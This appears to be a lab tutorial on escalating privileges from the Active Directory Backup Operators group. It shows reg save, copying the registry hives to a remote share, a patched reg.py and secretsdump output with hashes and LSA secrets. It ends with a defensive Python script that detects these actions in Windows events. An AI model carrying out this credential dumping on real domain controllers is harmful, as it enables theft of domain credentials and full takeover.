Backup Operator Privilege Escalation

Backup Operators is a default security group in Active Directory. Microsoft provides the following description:

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.

This article will look at a couple of ways of extracting the SAM database of a domain controller using an account that is a member of the Backup Operators group.

Local SAM Database Extraction

In our lab environment, we can see that the user Alice is a member of the Backup Operators and Remote Management Users groups:

net user alice /domain
The request will be processed at a domain controller for domain bordergate.local.

User name                    alice
Full Name                    alice
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            01/12/2023 12:56:20
Password expires             Never
Password changeable          02/12/2023 12:56:20
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   26/01/2024 14:15:42

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

Since Alice is a member of the Remote Management Users group, we can create a PSRemoting session to the domain controller. Because membership of Backup Operators grants her SeBackupPrivilege, we can take a copy of the HKLM SAM and SYSTEM hives:

PS C:\Users\alice> Enter-PSSession DC01
[DC01]: PS C:\Users\alice\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

[DC01]: PS C:\Users\alice\Documents> reg save hklm\sam c:\Windows\Tasks\SAM
The operation completed successfully.

[DC01]: PS C:\Users\alice\Documents> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.

[DC01]: PS C:\Windows\Tasks> copy SAM \\192.168.1.210\shared\SAM
[DC01]: PS C:\Windows\Tasks> copy SYSTEM \\192.168.1.210\shared\SYSTEM

We can then use impacket-secretsdump to extract the local administrator credentials for the host:

impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x8ac0fb2e229cb0c79777bb8125015a6c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bce86ff3bde5a13e0a97398231766df1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 

Remote SAM Database Extraction

If the user is unable to log in interactively to domain controllers, we can still extract the SAM database remotely using a patched version of the Impacket reg.py tool, which is available here: https://github.com/horizon3ai/backup_dc_registry.

python reg.py alice:'Password1'@192.168.1.205 backup -p '\\192.168.1.210\shared\'
Impacket v0.11.0 - Copyright 2023 Fortra

Dumping SAM hive to \\192.168.1.210\shared\\SAM
Dumping SYSTEM hive to \\192.168.1.210\shared\\SYSTEM
Dumping SECURITY hive to \\192.168.1.210\shared\\SECURITY

Since the SECURITY hive is also backed up using this method, we can also extract LSA secrets:

impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x8ac0fb2e229cb0c79777bb8125015a6c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bce86ff3bde5a13e0a97398231766df1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:25069e75ab3f1b9321b9c9455bf7627aef9d778bac417b22f0ec1c0694511eb38d702273c060276d1be8a5ab54b7fa8eba7a21ee5abfd801d78775c2a33b01e448709fc230db4b41b21976503f308897f32302fee191e98b85f468b8846df1bc54ea4a2231c764ac4ee9ba8ea8e701762c64a05717cced16036dbeda9725ebb9f92a6ed288d6904bbde92bb72b06438504d1ed8c8a7c59f49e5107114cd6a684cec67460cdf6a26176a0523fed417714287021725eeb8a0dc47b51bf8a0faf9b44806fa01a83ac037da40ef7a7c55a25ed02b1d77cb47bf6f8a8f51ea65b7ab69354d52856f5f5a068c8ef8442a6e41c
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:92312aa97b085a7d597f5aa8af114c9f
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x06d5b029e0966077058a8f25dfd3fa714c936f90
dpapi_userkey:0xfe1b2836006a6f73943efc9dc6cf2d0a43d90e88
[*] NL$KM 
 0000   43 8F 81 A3 36 D3 B0 2B  87 BA 1C 95 AF BE 33 DA   C...6..+......3.
 0010   92 94 45 3E 55 BD EE 67  D7 F0 05 50 39 CA 7F F9   ..E>U..g...P9...
 0020   D9 9D 8B FD C9 B7 F4 8C  25 89 9B 52 CB 27 2E C0   ........%..R.'..
 0030   42 E7 3E DB 56 35 70 8E  41 C6 78 A5 20 F2 C6 C4   B.>.V5p.A.x. ...
NL$KM:438f81a336d3b02b87ba1c95afbe33da9294453e55bdee67d7f0055039ca7ff9d99d8bfdc9b7f48c25899b52cb272ec042e73edb5635708e41c678a520f2c6c4
[*] Cleaning up... 

The domain controller's machine account credentials ($MACHINE.ACC above) could then be used to DCSync domain credentials.

In Conclusion

Backup Operators is a privileged group and should be monitored and protected in a similar manner to the Enterprise Admins and Domain Admins groups.
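As an added example of the monitoring this conclusion calls for (not part of the original article), the script below runs three detection rules over Windows Security events: a member being added to Backup Operators (event 4728/4732), a logon on a domain controller that receives SeBackupPrivilege from an account not on an allow-list (event 4672), and SeBackupPrivilege being exercised against the SAM, SYSTEM or SECURITY hive (event 4674, which requires the "Audit Sensitive Privilege Use" subcategory to be enabled). The event IDs are documented Windows audit events; the flattened JSON field names, the `svc_backup` allow-list entry and the sample events themselves are constructed for this example and should be checked against the schema your log collector actually produces.

```python
import json

# Documented Windows security event IDs used by the rules below
LOGON_PRIV_EVENT = 4672      # special privileges assigned to new logon
PRIV_USE_EVENT = 4674        # operation attempted on a privileged object
GROUP_ADD_EVENTS = {4728, 4732}  # member added to global / local security group

# The three hives whose backup yields credential material
SENSITIVE_HIVES = (
    "\\REGISTRY\\MACHINE\\SAM",
    "\\REGISTRY\\MACHINE\\SYSTEM",
    "\\REGISTRY\\MACHINE\\SECURITY",
)

# Assumed allow-list of accounts expected to hold SeBackupPrivilege on DCs,
# e.g. the backup product's service account (constructed for this example)
EXPECTED_BACKUP_ACCOUNTS = {"svc_backup"}


def check_event(ev):
    """Return an alert string for one parsed event, or None if nothing matches."""
    eid = ev.get("EventID")
    user = ev.get("SubjectUserName", "?")

    # Rule 1: membership change. In 4728/4732 the group name is carried in
    # TargetUserName and the new member in MemberName.
    if eid in GROUP_ADD_EVENTS and ev.get("TargetUserName", "").lower() == "backup operators":
        return f"MEMBERSHIP_CHANGE: {user} added {ev.get('MemberName', '?')} to Backup Operators"

    # Rule 2: a logon session on the DC was granted SeBackupPrivilege
    if eid == LOGON_PRIV_EVENT:
        if "SeBackupPrivilege" in ev.get("PrivilegeList", "") and user.lower() not in EXPECTED_BACKUP_ACCOUNTS:
            return f"UNEXPECTED_BACKUP_LOGON: {user} logged on to {ev.get('Computer', '?')} with SeBackupPrivilege"

    # Rule 3: SeBackupPrivilege actually used against a credential-bearing hive
    if eid == PRIV_USE_EVENT:
        obj = ev.get("ObjectName", "").upper()
        if "SeBackupPrivilege" in ev.get("Privileges", "") and obj.startswith(SENSITIVE_HIVES):
            return f"HIVE_BACKUP: {user} used SeBackupPrivilege on {obj} via {ev.get('ProcessName', '?')}"

    return None


def analyse(jsonl_text):
    """Run check_event over newline-delimited JSON events; return alerts in order."""
    alerts = []
    for line in jsonl_text.splitlines():
        line = line.strip()
        if not line:
            continue
        alert = check_event(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events (not real logs), modelled on the lab session in the article
SAMPLE_EVENTS = r"""
{"EventID": 4732, "Computer": "DC01", "SubjectUserName": "Administrator", "MemberName": "CN=alice,CN=Users,DC=bordergate,DC=local", "TargetUserName": "Backup Operators"}
{"EventID": 4672, "Computer": "DC01", "SubjectUserName": "svc_backup", "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"}
{"EventID": 4672, "Computer": "DC01", "SubjectUserName": "alice", "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"}
{"EventID": 4674, "Computer": "DC01", "SubjectUserName": "alice", "ObjectName": "\\REGISTRY\\MACHINE\\SAM", "Privileges": "SeBackupPrivilege", "ProcessName": "C:\\Windows\\System32\\reg.exe"}
{"EventID": 4674, "Computer": "DC01", "SubjectUserName": "alice", "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE", "Privileges": "SeBackupPrivilege", "ProcessName": "C:\\Windows\\System32\\reg.exe"}
{"EventID": 4624, "Computer": "DC01", "SubjectUserName": "bob"}
"""

if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(alert)
```

Rule 1 is the cheapest and most reliable signal, since the group is empty by default; rules 2 and 3 catch use of an existing membership, including the remote reg.py path, which still produces a network logon and registry access on the domain controller. Tune the allow-list to the service accounts that legitimately back up your DCs, and treat any other SeBackupPrivilege activity there as an incident.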